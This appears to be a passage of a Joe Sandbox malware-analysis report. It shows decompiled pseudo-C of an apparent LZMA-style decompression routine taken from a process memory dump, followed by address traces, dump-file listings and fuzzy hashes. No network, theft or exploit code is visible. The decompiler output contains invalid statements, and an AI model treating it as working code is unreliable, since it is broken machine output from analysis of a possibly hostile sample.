						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00407395
0x00407395
0x00407399
0x004073be
0x004073c8
0x00000000
0x0040739b
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a8
0x004073ac
0x004073ac
0x004073af
0x00407489
0x00407489
0x00407490
0x00407490
0x00407493
0x0040749a
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x00000000
0x004075cf
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x00000000
0x00406dec
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x004073cb
0x004073cb
0x00000000
0x00000000
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00000000
0x00407482
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x00000000
0x00000000
0x00407543
0x00407546
0x00407447
0x00407447
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x00000000
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x004075e5
0x004075eb
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00407524
0x00000000
0x00407399

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
